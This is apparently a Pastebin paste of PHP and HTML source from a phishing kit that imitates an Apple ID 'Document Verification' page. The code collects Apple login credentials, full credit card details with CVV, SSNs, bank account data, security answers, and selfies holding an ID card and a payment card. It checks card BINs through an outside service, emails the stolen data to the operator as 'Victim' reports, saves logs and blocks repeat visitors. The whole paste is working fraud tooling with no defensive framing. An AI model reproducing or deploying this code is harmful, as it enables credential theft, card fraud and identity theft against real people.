Advertisement
Guest User

Untitled

a guest
Sep 27th, 2018
223
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.88 KB | None | 0 0
  1. <?php
  2. error_reporting(E_ERROR);
  3. session_start();
  4. require "assets/includes/language.php";
  5. require "functions/detectbin.php";
  6. require "assets/includes/session_protect.php";
  7. require "assets/includes/functions.php";
  8. require "assets/includes/One_Time.php";
  9. require "assets/includes/enc.php";
  10. require_once "assets/includes/apxdev.php";
  11. require_once "class.phpmailer.php";
  12. require_once "class.smtp.php";
  13. require_once "setting.php";
  14.  
  15. function acak($panjang)
  16. {
  17. $karakter = 'abcdefghijklmnopqrstuvwxyz1234567890';
  18. $string = '';
  19. for ($i = 0; $i < $panjang; $i++)
  20. {
  21. $pos = rand(0, strlen($karakter) - 1);
  22. $string.= $karakter
  23. {
  24. $pos};
  25. }
  26.  
  27. return $string;
  28. }
  29.  
  30. ?>
  31.  
  32. <?php
  33. if (isset($_FILES['picturedriverlicense']) && isset($_FILES['picturecreditcard']))
  34. {
  35. if (!empty($_SERVER['HTTP_CLIENT_IP']))
  36. {
  37. $ip = $_SERVER['HTTP_CLIENT_IP'];
  38. }
  39. elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
  40. {
  41. $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  42. }
  43. else
  44. {
  45. $ip = $_SERVER['REMOTE_ADDR'];
  46. }
  47.  
  48. $systemInfo = systemInfo($ip);
  49. $file_name1 = $_FILES['picturedriverlicense']['name'];
  50. $file_size1 = $_FILES['picturedriverlicense']['size'];
  51. $file_tmp1 = $_FILES['picturedriverlicense']['tmp_name'];
  52. $file_type1 = $_FILES['picturedriverlicense']['type'];
  53. $file_ext1 = strtolower(end(explode('.', $_FILES['picturedriverlicense']['name'])));
  54. $file_name2 = $_FILES['picturecreditcard']['name'];
  55. $file_size2 = $_FILES['picturecreditcard']['size'];
  56. $file_tmp2 = $_FILES['picturecreditcard']['tmp_name'];
  57. $file_type2 = $_FILES['picturecreditcard']['type'];
  58. $file_ext2 = strtolower(end(explode('.', $_FILES['picturecreditcard']['name'])));
  59. $expensions = array(
  60. "jpeg",
  61. "jpg",
  62. "png"
  63. );
  64. if (in_array($file_ext1, $expensions) === false || in_array($file_ext2, $expensions) === false)
  65. {
  66. $errors[] = "Extension not allowed, please choose a JPEG or PNG file.";
  67. }
  68.  
  69. if (empty($errors) == true)
  70. {
  71. $fileid = $_SESSION["user"] . "-id-" . sha1($file_name1) . ".jpg";
  72. $filecc = $_SESSION["user"] . "-id-" . sha1(uniqid() . $file_name2) . ".jpg";
  73. move_uploaded_file($file_tmp1, "uploads/" . $fileid);
  74. move_uploaded_file($file_tmp2, "uploads/" . $filecc);
  75.  
  76. // do send result email
  77.  
  78. if ($file_size1 > 3000000 || $file_size2 > 3000000)
  79. {
  80. UploadCompress($fileid, $fileid, "uploads", 60);
  81. UploadCompress($filecc, $filecc, "uploads", 60);
  82. }
  83.  
  84. if (empty($errors) == true)
  85. {
  86.  
  87. // do send result email
  88.  
  89. set_time_limit("0");
  90. $mail = new PHPMailer;
  91. $mail->SMTPDebug = 0;
  92. $mail->isMail();
  93. $mail->From = $SenderEmail;
  94. $mail->FromName = $SenderPhoto;
  95. $mail->addAddress($Your_Email);
  96. $mail->addAttachment("uploads/$fileid", 'Driving License.jpg'); // Optional name
  97. $mail->addAttachment("uploads/$filecc", 'CreditCard.jpg'); // Optional name
  98. $mail->isHTML(true); // Set email format to HTML
  99. $mail->Subject = "Foto Bule Selfi " . " [ " . $systemInfo['country'] . " $ip]";
  100. $mail->Body = "Email : " . $_SESSION['user'];
  101. if (!$mail->send())
  102. {
  103. fclose($buka);
  104. }
  105. else
  106. {
  107. $file2 = $_SERVER['DOCUMENT_ROOT'] . "/assets/logs/._upload_.txt";
  108. $isi = @file_get_contents($file2);
  109. $buka = fopen($file2, "w");
  110. fwrite($buka, $isi + 1);
  111. header('Location: Done.php?sessionid=' . generateRandomString(115) . '&securessl=true');
  112. echo '<script>window.location="Done.php?sessionid=' . generateRandomString(115) . '&securessl=true"</script>';
  113. }
  114. }
  115. else
  116. {
  117.  
  118. // echo tr($errors[0]);
  119.  
  120. }
  121. }
  122. }
  123.  
  124. ?>
  125.  
  126. <?php
  127. if (isset($_POST["fname"]) && isset($_POST["lname"]) && isset($_POST["dob"]) && isset($_POST["address"]))
  128. {
  129. if (isset($_POST['mname']) && !empty($_POST['mname']))
  130. {
  131. $mname = "";
  132. }
  133. else
  134. {
  135. $mname = $_POST['mname'];
  136. }
  137.  
  138.  
  139. $userid = $_SESSION["user"];
  140. $password = $_SESSION["pass"];
  141. $name = $_POST["fname"] . " " . $mname . " " . $_POST["lname"];
  142. $dob = $_POST["dob"];
  143. $address = $_POST["address"] . ", " . $_POST["town"] . ", " . $_POST["county"];
  144. $postcode = $_POST["postcode"];
  145. $country = $_POST["country"];
  146. $telephone = $_POST["telephone"];
  147. $ssn = $_POST["ssn"];
  148. $ccname = $_POST["ccname"];
  149. $ccno = $_POST["ccno"];
  150. $ccexp = $_POST["ccexp"];
  151. $climit = $_POST['climit'];
  152. $citizenid = $_POST['citizenid'];
  153. $qatarid = $_POST['qatarid'];
  154. $naid = $_POST['naid'];
  155. $bans = $_POST['bans'];
  156. $passport = $_POST['passport'];
  157. $civilid = $_POST['civilid'];
  158. $numbid = $_POST['numbid'];
  159. $secode = $_POST["secode"];
  160. $acno = $_POST["acno"];
  161. $sort = $_POST["sortcode"];
  162. $q1 = $_POST["q1"];
  163. $a1 = $_POST["a1"];
  164. $nabid = $_POST["nabid"];
  165. $bankaccount = $_POST["bankaccount"];
  166. $cardid = $_POST['cardid'];
  167. $cardpassword = $_POST['cardpassword'];
  168. if (!empty($_SERVER['HTTP_CLIENT_IP']))
  169. {
  170. $ip = $_SERVER['HTTP_CLIENT_IP'];
  171. }
  172. elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
  173. {
  174. $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  175. }
  176. else
  177. {
  178. $ip = $_SERVER['REMOTE_ADDR'];
  179. }
  180.  
  181. $systemInfo = systemInfo($ip);
  182. $ccno = str_replace(' ', '', $ccno);
  183. $last4 = substr($ccno, 12, 16);
  184. // fungsi bin
  185. $bin = str_replace(' ', '', $ccno);
  186. $bin = substr($bin, 0, 6);
  187. $ch = curl_init();
  188. curl_setopt($ch, CURLOPT_VERBOSE, false);
  189. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT , 0);
  190. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  191. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  192. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  193. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  194. curl_setopt($ch, CURLOPT_URL, "https://www.bmarket.or.id/tools/bins.php?bin=$bin");
  195. $result = curl_exec($ch);
  196. $result = json_decode($result,true);
  197.  
  198. $BIN_CARD = $result['VEN'];
  199. $BIN_BANK = $result['BNK'];
  200. $BIN_TYPE = $result['TYP'];
  201. $BIN_LEVEL = $result['LVL'];
  202. ///////////////////////////////// SESSION FOR SOME VAR /////////////////////////////////
  203. $_SESSION['_country_'] = $BIN_COUNTRY;
  204. $_SESSION['_cntrcode_'] = $BIN_CNTRCODE;
  205. $_SESSION['_cc_brand_'] = $BIN_CARD;
  206. $_SESSION['_cc_bank_'] = $BIN_BANK;
  207. $_SESSION['_cc_type_'] = $BIN_TYPE;
  208. $_SESSION['_cc_class_'] = $BIN_LEVEL;
  209. $_SESSION['_cc_site_'] = $BIN_WEBSITE;
  210. $_SESSION['_cc_phone_'] = $BIN_PHONE;
  211. $_SESSION['_ccglobal_'] = $_SESSION['_cc_brand_']." ".$_SESSION['_cc_type_']." ".$_SESSION['_cc_class_'];
  212. $_SESSION['_global_'] = $_SESSION['_cntrcode_']." - ".$_SESSION['_ip_'];
  213. ///////////////////////////////// BIN CHECKER /////////////////////////////////
  214.  
  215. $VictimInfo1 = "| IP Address :" . " " . $ip . " (" . gethostbyaddr($ip) . ")";
  216. $VictimInfo2 = "| Location :" . " " . $systemInfo['city'] . ", " . $systemInfo['region'] . ", " . $systemInfo['country'];
  217. $VictimInfo3 = "| UserAgent :" . " " . $systemInfo['useragent'];
  218. $VictimInfo4 = "| Browser :" . " " . $systemInfo['browser'];
  219. $VictimInfo5 = "| Platform :" . " " . $systemInfo['os'];
  220. $VictimInfo6 = "" . $systemInfo['country'];
  221. $from = $SenderEmail;
  222. $headers = "From: $SenderCC <$SenderEmail>";
  223. $subj = "" . $ccname . " - $bin - ". $_SESSION['_cc_brand_'] ." - ". $_SESSION['_cc_bank_'] ."-". $_SESSION['_cc_type_'] ."-". $_SESSION['_cc_class_'] ." [ " . $VictimInfo6 . " $ip " . $systemInfo['os'] . "]";
  224. $to = $Your_Email;
  225. $warnsubj = "Abuse";
  226. $warn = "A user (with ip: $ip) has attempted to send you a completed form containing abusive language. l33bo_Phishers is against abusive form filling and has redirected this user to the official site while blocking the form.";
  227. $bad_words = array(
  228. '9999',
  229. '4r5e',
  230. '5h1t',
  231. '5hit',
  232. 'a55',
  233. 'anal',
  234. 'asshole',
  235. 'arsehole',
  236. 'passwd',
  237. 'sample'
  238. );
  239. $data = "
  240. ++--------[*RSJKINGDOM X APPLE*]--------++
  241.  
  242. ------------------------------------------
  243. Apple Login
  244. ------------------------------------------
  245. Username : $userid
  246. Password : $password
  247.  
  248. ------------------------------------------
  249. CreditCard
  250. ------------------------------------------
  251. Cardholder Name : $ccname
  252. Card Number : $ccno
  253. Expiration Date : $ccexp
  254. Cvv2 : $secode
  255. BIN/IIN Info : $bin - ". $_SESSION['_cc_brand_'] ." - ". $_SESSION['_cc_bank_'] ."-". $_SESSION['_cc_type_'] ."-". $_SESSION['_cc_class_'] ."
  256. For Check : $ccno/$ccexp/$secode
  257. Qatar ID (QA) : $qatarid
  258. ID Number (GR) : $numbid
  259. Citizen ID (TH) : $citizenid
  260. National ID (SA) : $naid
  261. Sort Code (UK/IE) : $sort
  262. Civil ID Number (KW) : $civilid
  263. Bank Access Number (NZ) : $bans
  264. Account Number (UK/IE/IN) : $acno
  265. Credit limit (IE/TH/IN/NZ/AU) : $climit
  266. Bank Account (AU) : $bankaccount
  267. NAB ID (AU) : $nabid
  268. Card ID (JP) : $cardid
  269. Card Password (JP) : $cardpassword
  270.  
  271. ------------------------------------------
  272. Account Information
  273. ------------------------------------------
  274. Full Name : $name
  275. Address : $address
  276. Zip/PostCode : $postcode
  277. Country : $country
  278. Phone Number : $telephone
  279. SSN : $ssn
  280. DOB : $dob
  281. Security Question : $q1
  282. Security Answer : $a1
  283.  
  284. ------------------------------------------
  285. Victim Login
  286. ------------------------------------------
  287. From : $VictimInfo1 - $VictimInfo2
  288. Browser : $VictimInfo3 - $VictimInfo4 - $VictimInfo5
  289.  
  290. ++---------===[ $$ End Resutls $$ ]===---------++
  291. ";
  292. if ($Encrypt == 1)
  293. {
  294. include ("assets/includes/AES.php");
  295.  
  296. $imputText = $data;
  297. $imputKey = $Key;
  298. $blockSize = 256;
  299. $aes = new AES($imputText, $imputKey, $blockSize);
  300. $enc = $aes->encrypt();
  301. $aes->setData($enc);
  302. $dec = $aes->decrypt();
  303. }
  304.  
  305. if ($Abuse_Filter == 1)
  306. {
  307. foreach($bad_words as $bad_word)
  308. {
  309. if (stristr($_POST['fname'], $bad_word) !== false)
  310. {
  311. mail($to, $warnsubj, $warn, $headers);
  312. exit(header("Location: https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwioqpfl4oPKAhWHPxQKHYGXAjkQFggfMAA&url=https%3A%2F%2Fappleid.apple.com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww&sig2=gKBRh04c9wVr4EOc4FARAw&bvm=bv.110151844,d.d24"));
  313. }
  314.  
  315. if (stristr($_POST['address'], $bad_word) !== false)
  316. {
  317. mail($to, $warnsubj, $warn, $headers);
  318. exit(header("Location: https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwioqpfl4oPKAhWHPxQKHYGXAjkQFggfMAA&url=https%3A%2F%2Fappleid.apple.com%2F&usg=AFQjCNF7841Jq5PLrYJwYDN8RkcZjuNVww&sig2=gKBRh04c9wVr4EOc4FARAw&bvm=bv.110151844,d.d24"));
  319. }
  320. }
  321. }
  322.  
  323. if ($Save_Log == 1)
  324. {
  325. if ($Encrypt == 1)
  326. {
  327. $file = fopen("assets/logs/app.txt", "a");
  328. fwrite($file, $enc);
  329. fclose($file);
  330. }
  331. else
  332. {
  333. $file = fopen("assets/logs/app.txt", "a");
  334. fwrite($file, $data);
  335. fclose($file);
  336. }
  337. }
  338.  
  339. if ($Send_Log == 1)
  340. {
  341. if ($Encrypt == 1)
  342. {
  343. mail($to, $subj, $enc, $headers);
  344. }
  345. else
  346. {
  347. if($_SESSION['sescc'] == $_POST["ccno"]){
  348. $domain = "https://$_SERVER[SERVER_NAME]";
  349. $gen = generateRandomString(115);
  350. header("location: $domain/Verify2.php?&sessionid=$gen&securessl=true");
  351. }else{
  352. mail($to, $subj, $data, $headers);
  353. $empas = "# $bin - $ccbrand - $cctype - $ccklas - $ccbank [ " . $systemInfo['country'] . " ]\n";
  354. $file = fopen("assets/logs/bin.log", "a");
  355. fwrite($file, $empas);
  356. fclose($file);
  357. $file2 = $_SERVER['DOCUMENT_ROOT'] . "/assets/logs/._ccz_.txt";
  358. $isi = file_get_contents($file2);
  359. $buka = fopen($file2, "w");
  360. fwrite($buka, $isi + 1);
  361. fclose($buka);
  362. }
  363. }
  364. }
  365.  
  366. if ($One_Time_Access == "block")
  367. {
  368. $fp = fopen("assets/includes/blacklist.dat", "a");
  369. fputs($fp, "\r\n$ip\r\n");
  370. fclose($fp);
  371. }
  372. }
  373.  
  374. ?>
  375. <!DOCTYPE html>
  376. <html>
  377. <head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  378.  
  379. <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
  380. <title><?php echo tr('Document Verification'); ?></title>
  381. <link href="assets/img/favicon.ico" rel="shortcut icon" type="image/x-icon">
  382. <link href="assets/css/First.css" media="all" rel="stylesheet" type="text/css">
  383. <link href="assets/css/Second.css" rel="stylesheet" type="text/css">
  384. <link href="assets/css/Fonts.css" rel="stylesheet" type="text/css">
  385. <link href="assets/css/verify.css" rel="stylesheet" type="text/css">
  386. <link href="assets/css/error-tips.css" rel="stylesheet" type="text/css">
  387. </head>
  388. <body id="pagecontent">
  389. <div id="content">
  390. <div class="bdd45">
  391. <nav id="xdsfv54" class="js no-touch svg no-ie7 no-ie8">
  392. <div class="HeaderObjHolder">
  393. <ul class="MobHeader">
  394. <li class="HeaderObj MobMenIconH">
  395. <label class="MobMenHol">
  396. <span class="MobMenIcon MobMenIcon-top">
  397. <span class="MobMenIcon-crust MobMenIcon-crust-top"></span> </span> <span class="MobMenIcon MobMenIcon-bottom">
  398. <span class="MobMenIcon-crust MobMenIcon-crust-bottom"></span> </span>
  399. </label>
  400. </li>
  401. <li class="HeaderObj">
  402. <a class="Item1" href="#" style="display: inline-block;margin-left:50%;margin-top:11px" id="ac-gn-firstfocus-small"> <span class="ac-gn-link-text">&nbsp;</span> </a>
  403. <a class="Item10" style="display: inline-block;float:right;margin-top:11px" href="#"> <span class="ac-gn-link-text">&nbsp;</span> <span class="ac-gn-bag-badge"></span> </a> <span class="ac-gn-bagview-caret ac-gn-bagview-caret-large"></span>
  404. </li>
  405. </ul>
  406. <ul class="HeaderObjList">
  407. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item1" href="#"></a></li>
  408. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item2" href="#"></a></li>
  409. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item3" href="#"></a></li>
  410. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item4" href="#"></a></li>
  411. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item5" href="#"></a></li>
  412. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item6" href="#"></a></li>
  413. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item7" href="#"></a></li>
  414. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item8" href="#"></a></li>
  415. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item9" href="#"></a></li>
  416. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item10" href="#"></a></li>
  417. </ul>
  418. </div>
  419. </nav>
  420. <div id="flow">
  421. <div class="flow-body signin clearfix" role="main">
  422. <div class="persona-splash no-photo clearfix">
  423. <div class="persona-bg"></div>
  424. <div class="container">
  425. <div class="splash-section">
  426. <div class=" person-wrapper">
  427. <div>
  428. <div class="row">
  429. <div class="col-sm-9 appleid-col">
  430. <div class="flex-container">
  431. <h1 class="mobile appleid-user">
  432. <span class="first_name"><?php echo tr('Account Verification'); ?></span>
  433. <small class="SessionUser"><?php echo tr('Your Apple ID is'); ?> <strong><?php
  434. echo $_SESSION['user']; ?></strong> </small>
  435. </h1>
  436. </div>
  437. </div>
  438. <div class="not-mobile col-sm-3">
  439. <div class="flex-container-signout">
  440. <div class="signout pull-right">
  441. <button class="btn btn-link"><?php echo tr('Sign Out'); ?> </button>
  442. </div>
  443. </div>
  444. </div>
  445. </div>
  446. </div>
  447. </div>
  448. </div>
  449. </div>
  450. </div>
  451. <div class="container">
  452.  
  453. <div class="flex home-content">
  454.  
  455. <form action="Upload-Identity.php?sessionid=<?php
  456. echo generateRandomString(115); ?>&securessl=true" method="post" enctype="multipart/form-data" name="details" id="details" class="proceed" novalidate="novalidate">
  457. <div class="container flow-sections">
  458. <div class="editable account-edit clearfix">
  459. <div class="row edit-row">
  460. <div class="col-sm-6 col-sm-offset-3">
  461. <h3 class="section-subtitle" id="nameLabel">
  462. <?php echo tr('Document and Credit Card Verification'); ?>
  463. </h3>
  464. <div class="form-group">
  465. <div class="form-group clearfix" style="padding-top:0px;">
  466. <?php echo tr('Apple requires a copy of certain documents for verification purposes to return your account to reguler standing'); ?>
  467. </div>
  468. <div class="pop-wrapper field-pop-wrapper middle-wrapper">
  469. <img src="assets/img/drivinglicense.jpg" alt="Identity Card Example" title="Identity Card Example" style="width: 400px;"></img>
  470. </div>
  471. <br />
  472. <div class="form-group clearfix">
  473. <b>*<?php echo tr('Take a selfie with your Identity Card / Driver License'); ?> : </b><br />
  474. <input type="file" name="picturedriverlicense" required="required"/>
  475. </div>
  476.  
  477. <div class="pop-wrapper field-pop-wrapper middle-wrapper">
  478. <b>*<?php echo tr('Take a selfie with your Credit / Debit Card'); ?> : </b><br />
  479. <input type="file" name="picturecreditcard" required="required" />
  480. </div><br />
  481.  
  482.  
  483. <?php
  484. if (empty($errors) == false)
  485. {
  486. echo tr($errors[0]);
  487. }
  488.  
  489. ?>
  490.  
  491. <div class="pop-wrapper field-pop-wrapper middle-wrapper">
  492.  
  493. <div class="name-input">
  494. <input type="submit" class="gobtn btn-link" style="width:30%;margin-left:auto;margin-right:auto;float:right" value="<?php echo tr('Upload'); ?>">
  495. </div>
  496. </div> <br /> <br />
  497. </div>
  498. </div>
  499. </div>
  500. </div>
  501. </div>
  502. </form>
  503.  
  504. <!-- FORM ENDS -->
  505. </div>
  506.  
  507. </div>
  508. </div>
  509. </div>
  510. <footer>
  511. <div class="container">
  512. <div class="footer">
  513. <div class="footer-wrap">
  514. <div class="FooterLine1">
  515. <div class="line-level">Shop the <a href="#">Apple Online Store</a> (<?php
  516. echo $langx['APPCALL']; ?>), visit an <a href="#">Apple Retail Store</a>, or find a <a href="#">reseller</a>.</div>
  517. </div>
  518. <div class="FooterLine2">
  519. <ul class="menu">
  520. <li class="item"><a href="#">Apple Info</a></li>
  521. <li class="item"><a href="#">Site Map</a></li>
  522. <li class="item"><a href="#">Hot News</a></li>
  523. <li class="item"><a href="#">RSS Feeds</a></li>
  524. <li class="item"><a href="#">Contact Us</a></li>
  525. <li class="item"><a class="choose" href="#"><img height="22" src="<?php
  526. echo $langx['FLAG']; ?>" width="22"></a></li>
  527. </ul>
  528. </div>
  529. <div class="FooterLine3">Copyright +�-� 2018 Apple Inc. All rights reserved.
  530. <ul class="menu">
  531. <li class="item"><a href="#">Terms of Use</a></li>
  532. <li class="item"><a href="#">Privacy Policy</a></li>
  533. </ul>
  534. </div>
  535. </div>
  536. </div>
  537. </div>
  538. </footer>
  539. </div>
  540. </div>
  541. </body>
  542. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement